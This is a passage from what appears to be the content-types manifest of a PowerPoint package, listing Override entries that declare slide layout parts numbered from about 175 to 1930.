  <Override PartName="/ppt/slideLayouts/slideLayout1741.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1742.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1743.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1744.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1745.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1746.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1747.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1748.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1749.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout175.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1750.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1751.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1752.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1753.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1754.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1755.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1756.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1757.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1758.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1759.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout176.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1760.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1761.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1762.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1763.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1764.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1765.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1766.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1767.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1768.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1769.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout177.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1770.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1771.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1772.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1773.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1774.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1775.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1776.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1777.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1778.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1779.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout178.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1780.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1781.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1782.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1783.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1784.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1785.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1786.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1787.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1788.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1789.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout179.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1790.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1791.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1792.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1793.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1794.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1795.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1796.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1797.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1798.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1799.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout18.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout180.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1800.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1801.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1802.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1803.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1804.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1805.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1806.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1807.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1808.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1809.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout181.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1810.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1811.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1812.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1813.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1814.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1815.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1816.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1817.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1818.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1819.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout182.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1820.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1821.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1822.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1823.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1824.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1825.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1826.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1827.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1828.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1829.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout183.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1830.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1831.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1832.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1833.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1834.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1835.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1836.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1837.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1838.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1839.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout184.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1840.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1841.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1842.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1843.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1844.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1845.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1846.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1847.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1848.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1849.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout185.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1850.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1851.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1852.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1853.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1854.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1855.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1856.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1857.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1858.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1859.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout186.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1860.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1861.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1862.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1863.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1864.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1865.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1866.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1867.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1868.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1869.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout187.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1870.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1871.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1872.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1873.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1874.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1875.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1876.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1877.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1878.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1879.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout188.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1880.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1881.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1882.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1883.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1884.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1885.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1886.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1887.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1888.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1889.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout189.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1890.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1891.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1892.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1893.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1894.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1895.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1896.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1897.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1898.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1899.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout19.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout190.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1900.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1901.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1902.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1903.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1904.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1905.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1906.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1907.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1908.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1909.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout191.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1910.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1911.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1912.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1913.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1914.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1915.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1916.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1917.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1918.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1919.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout192.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1920.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1921.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1922.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1923.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1924.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1925.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1926.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1927.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1928.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1929.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout193.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1930.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
